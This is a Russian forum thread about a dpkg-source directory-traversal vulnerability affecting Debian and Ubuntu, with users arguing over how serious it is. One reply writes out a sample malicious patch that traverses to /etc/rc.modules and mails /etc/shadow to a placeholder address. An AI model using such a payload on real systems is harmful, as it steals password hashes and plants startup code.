LINUX.ORG.RU
ФорумTalks

[Решето!] Обход каталога в dpkg в Debian Linux / Ubuntu


0

0

Debian Linux 5.0
Ubuntu Linux 6.06
Ubuntu Linux 8.04
Ubuntu Linux 8.10
Ubuntu Linux 9.04
Ubuntu Linux 9.10

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести неавторизованное изменение данных.

Уязвимость существует из-за ошибки обхода каталога в компоненте dpkg-source в dpkg версии до 1.14.29. Удаленный пользователь может с помощью специально сформированного архива перезаписать произвольные файлы на системе за пределами директории назначения.

http://www.securitylab.ru/vulnerability/391771.php

★★★★★

Вот и пришла очередь линупса

а венда все rock stableвее

wfrr ★★☆
()

[:||:]

давно уже обновили в репозиториях

Sylvia ★★★★★
()
Ответ на: комментарий от ezoteric

знаешь решето это то что в пакете может быть троян с битом suid и никакого способа защиты от этого нету 8)

wfrr ★★☆
()

ну вы мне покажите это «удаленному пользователю произвести неавторизованное изменение данных» - тогда я и буду всхлипывать над этой
проблемой.
Взлом это называется в народе ,а не «неавторизованное изменение данных» или лапух там сисадмин изначально.
параноики такие параноики

elipse ★★★
()
Ответ на: комментарий от ezoteric

>странно, такое решето и никого в треде !!!

ждут на гланге

madcore ★★★★★
()
Ответ на: комментарий от wfrr

>решето это то что в пакете может быть троян с битом suid и никакого способа защиты от этого нету

Какие ты все время страшные вещи рассказываешь
Прямо хоть на LFS переходи

ist76 ★★★★★
()

Достаточно опасно — вам предложат посмотреть архив с исходниками для dpkg и захватят систему. Это связано с хранением патча отдельно.

Так что Слака хороша — там патч применяется только для сборки и идет через утилиту patch

Xenius ★★★★★
()

>Уязвимость позволяет удаленному пользователю произвести неавторизованное изменение данных.

для этого ему нужно:
1) стать мейнтейнером дебиана/убунты
2) собрать пакет
3) подписать его
4) залить в репзиторий
5) скрыться от полиции и злых пользователей, желающих оторвать ему яйца

Либо найти идиота, ставящего все подряд из любых источников. Но на таких идиотов есть миллион более простых способов.

nu11 ★★★★★
()
Ответ на: комментарий от Xenius

> Так что Слака хороша — там патч применяется только для сборки и идет через утилиту patch

слака хороша не только этим.
а по теме - паника из-за ничего. этот пакет еще надо сформировать и в репозиторий всунуть.

Komintern ★★★★★
()

е. кашмарский залогиньтесь!

да и что красть то у лунуксойдов?

ggrn ★★★★★
()
Ответ на: комментарий от Xenius

> Так что Слака хороша — там патч применяется только для сборки и идет через утилиту patch

Вот напишут тебе где-нибудь в патче что-то вроде

@../../../../../dev/null, ../../../../../../../../../etc/rc.modules (755), 1
+#!/bin/sh
+mail -s «Take it» user@domain.com </etc/shadow

и будешь ты потом вместе со своей слакой известно где.

no-dashi ★★★★★
()
Ответ на: комментарий от no-dashi

> Вот напишут тебе где-нибудь в патче что-то вроде
Ну да и пусть напишут, во-первых:
$ mail -v -s «Take it» user@domain.com < /etc/passwd
user@domain.com... Connecting to [127.0.0.1] via relay...
user@domain.com... Deferred: Connection refused by [127.0.0.1]
$ LANG=C ls /etc/rc.modules
/bin/ls: cannot access /etc/rc.modules: No such file or directory
А во-вторых, патчи надо смотреть прежде чем применять, особенно если они не из надежного источника, такого как список рассылки slackware-security

А в третьих, толку им от моего /etc/shadow, даже если они там что-нибудь расшифруют? 22-й порт заблочен фаерволом, я за провайдерским NAT и ssh-сервер по умолчанию не запущен...

Xenius ★★★★★
()
Ответ на: комментарий от Komintern

>а по теме - паника из-за ничего. этот пакет еще надо сформировать и в репозиторий всунуть.

Или скачать с сайта, как скайп или виртуалбокс

Bers666 ★★★★★
()
Ответ на: комментарий от anotheranonymous

++
Удалённый пользователь... который сможет заюзать dpkg, агада.
Скажем, возможно только когда нуп пытается поставить что-то непроверенное.

tia
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.